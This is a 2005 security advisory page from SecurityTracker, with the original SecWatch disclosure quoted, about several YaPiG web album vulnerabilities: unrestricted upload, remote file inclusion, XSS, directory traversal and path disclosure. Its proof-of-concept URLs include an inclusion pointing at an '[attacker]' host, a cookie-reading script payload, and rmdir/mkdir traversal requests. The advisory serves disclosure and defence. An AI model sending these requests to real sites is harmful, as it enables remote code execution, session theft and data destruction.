SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   YaPiG Vendors:   yapig.sourceforge.net
YaPiG Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Create/Delete Directories and Let Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1014103
SecurityTracker URL:  http://securitytracker.com/id/1014103
CVE Reference:   CVE-2005-1881, CVE-2005-1882, CVE-2005-1883, CVE-2005-1884, CVE-2005-1885, CVE-2005-1886   (Links to External Site)
Updated:  Jun 9 2005
Original Entry Date:  Jun 5 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 0.92b, 0.93u, and 0.94u
Description:   SecWatch reported several vulnerabilities in YaPiG. A remote user can conduct cross-site scripting attacks and determine the installation path. A remote authenticated user can execute arbitrary PHP code and operating system commands on the target system and can create and delete directories on the target system.

The 'upload.php' script does not properly validate file extensions of uploaded image files. A remote authenticated user can upload files containing arbitrary content, such as PHP code, and then cause the target web server to execute the files. The PHP code, including operating system commands, will run with the privileges of the target web service.

Some demonstration exploit URLs are provided:

http://[target]/global.php?BASE_DIR=/local/path/to/global-gen.php

http://[target]/last_gallery.php?YAPIG_PATH=http://[attacker]/

The script also fails to properly validate user-supplied input in the 'dir' parameter before using the data as part of rmdir() and mkdir() function calls. A remote authenticated user can submit specially crafted parameter values containing '../' directory traversal characters to create and delete arbitrary directories located outside of the gallery directory.

Some demonstration exploit URLs are provided:

http://[target]/upload.php?step=rmdir&dir=../folder

http://[target]/upload.php?step=mkdir&dir=../folder

Several scripts include files relative to parameters that can be modified by remote users. A remote user can supply a specially crafted parameter value to cause arbitrary PHP code from a remote site to be included and executed by the target web service.

The 'view.php' script does not properly validate user-supplied input in the 'phid' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the YaPiG software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/view.php?gid=1&phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

Other parameters are affected when a remote user adds a new comment.

The system stores plain text authentication data on the target user's browser if the '$USE_COOKIES=true;' parameter is set. A local user on the target user's system can obtain authentication data.

A remote user can also supply the following type of URL to cause the system to disclose the installation path:

http://[target]/view.php?gid=1&phid=alpha

The vendor was notified on May 30, 2005, without response.

SecWatch reported this vulnerability. An anonymous person discovered the vulnerability.

The original advisory is available at:

http://secwatch.org/advisories/secwatch/20050530_yapig.txt

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the YaPiG software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote authenticated user can upload scripting code to the target system and execute the code.

A remote authenticated user can create and delete directories on the target system.

A remote authenticated user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can determine the installation path.

Solution:   No solution was available at the time of this entry.
Vendor URL:  yapig.sourceforge.net/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  YaPiG Remote Arbitrary File Inclusion,


======================================================================

                       SecWatch 04/06/2005

     YaPiG Remote Arbitrary File Inclusion, Cross-Site Scripting
            and Information Disclosure Vulnerabilities

======================================================================
Table of Contents

Product Introduction.................................................1
Affected ............................................................2
Severity.............................................................3
Description of Vulnerability.........................................4
Proof of Concept.....................................................5
Solution.............................................................6
Time Line............................................................7
Credits..............................................................8

======================================================================
1) Introduction

Homepage: http://yapig.sourceforge.net/
Overview: YaPiG is a simple but powerful web album.
Advisory: http://secwatch.org/advisories/secwatch/20050530_yapig.txt
SWID: 1010769

======================================================================
2) Affected

YaPiG version 0.92b, 0.93u and 0.94u.

Prior versions may also be affected.

======================================================================
3) Severity

Rating: Less Critical
Impact: Exposure of system information
        System access
        Manipulation of data
        Cross Site Scripting
Where:  From remote
Action: Public disclosure

======================================================================
4) Description of Vulnerabilities

Multiple input validation and design vulnerabilities in YaPiG have been
reported, which can be exploited by remote users to execute arbitrary
code, conduct cross-site scripting attacks, disclose sensitive
information, create and remove arbitrary directories and potentially gain
administrative access to the web album.

The "upload.php" script fails to verify the extension of uploaded images,
a remote, authenticated user can upload arbitrary files (e.g. php files)
to execute arbitrary commands on the target system with privileges of the
target web server.

Numerous scripts insecurely include scripts, if register_globals is
enabled a remote, unauthenticated user can include arbitrary files from
local and remote resources.

The "view.php" script fails to correctly sanitise user-supplied input
passed to the "phid" parameter, which a remote user can exploit to execute
arbitrary script code in the security context of an affected website, as a
result the code will be able to access any of the target user"s cookies,
access data recently submitted by the target user via web form to the
site, or take actions on the site acting as the target user.

The "view.php" script also fails to sanitise user-supplied input POSTed to
various parameters when adding a new comment, which can also be exploited
to conduct cross-site scripting attacks.

The "view.php" script also discloses the full installation path upon a
non-integer value being passed to the "phid" parameter.

The "upload.php" script fails to validate user-supplied input passed to
the "dir" parameter before being used in "rmdir()" and "mkdir()" calls. A
remote, authenticated user can create and remove arbitrary directories
outside of the gallery directory via the common "../" directory traversal
characters.

If "$USE_COOKIES=true;" is set (non-default) authentication details are
stored in plain text in session cookies. A local user can access browser
cookies to gain administrative access to the web album.

Various other scripts/parameters are reportedly affected by similar issues.

======================================================================
5) Proof of Concept

Cross-Site Scripting:
http://[target]/view.php?gid=1&phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

Arbitrary File Inclusion:
Version 0.92b:
http://[target]/global.php?BASE_DIR=/local/path/to/global-gen.php
Version 0.93u/ 0.94u:
http://[target]/last_gallery.php?YAPIG_PATH=http://[attacker]/

Arbitrary Directory Removal:
http://[target]/upload.php?step=rmdir&dir=../folder

Arbitrary Directory Creation:
http://[target]/upload.php?step=mkdir&dir=../folder

Information Disclosure:
http://[target]/view.php?gid=1&phid=alpha

======================================================================
6) Solution

Edit source manually to ensure user-supplied input is correctly sanitised.

Filter malicious characters and character sequences via a HTTP proxy or
firewall with URL filtering capabilities.

Production systems should not display errors to clients.

Set 'register_globals=Off' in php.ini.

Use another product.

======================================================================
7) Time Line
29/05/2005 - Infomation reported to SecWatch.
30/05/2005 - Information validated by SecWatch.
             Vendor notified, no response.
02/06/2005 - Vendor notified via alternative e-mail address, no response.
04/06/2005 - Public disclosure.

======================================================================
8) Credits
Discovered by an anonymous person, reported via SecWatch.
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC